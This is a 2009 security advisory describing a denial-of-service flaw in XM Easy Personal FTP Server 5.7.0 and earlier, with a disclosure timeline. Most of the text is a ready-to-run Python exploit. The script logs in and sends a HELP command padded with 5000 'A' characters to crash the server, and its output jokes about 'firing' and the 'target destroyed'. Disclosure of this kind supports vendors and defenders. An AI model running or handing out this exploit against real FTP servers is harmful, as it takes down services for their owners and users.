|
Brought to you by:
Suppliers of:
|
|
|
| |
| XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication. |
| |
Credit:
The information has been provided by NeerajT.
|
| |
Vulnerable Systems:
* XM Easy Personal FTP Server version 5.7.0 and prior
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.
Exploit:
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............
import os
import sys
import time
from ftplib import FTP
def usage():
print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"
# The Main function starts here..
if __name__ == "__main__":
ftpport = '21'
# get the args..
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]
print "Connecting to "+ftpserver+" using "+user+"....",
# Try opening a connection to the FTP server
try:
F = FTP(ftpserver)
F.timeout = 3
if F:
print 'Connected !'
except:
print "\nCould not connect to the Server :(\n"
sys.exit(1)
#Lets create the Buffer..
crap = "A" * 5000
# Creat'in da'bomb
dabomb = 'HELP '+crap
print "Press any key to login.."
ch = sys.stdin.read(1)
# Lets login
try:
F.login(user, passwd)
except:
print "Oops.. Looks like you forgot to create a login !!\n"
F.quit()
sys.exit(1)
print "Target Locked, Press any key to fire..",
ch = sys.stdin.read(1)
print 'Sendin Da\'Bomb..'
try:
F.sendcmd(dabomb)
except:
print 'Target destroyed !! Mission successfull..!'
print 'Returning to base..'
F.close()
sys.exit(0)
Disclosure Timeline:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure
|
|
|
|
|
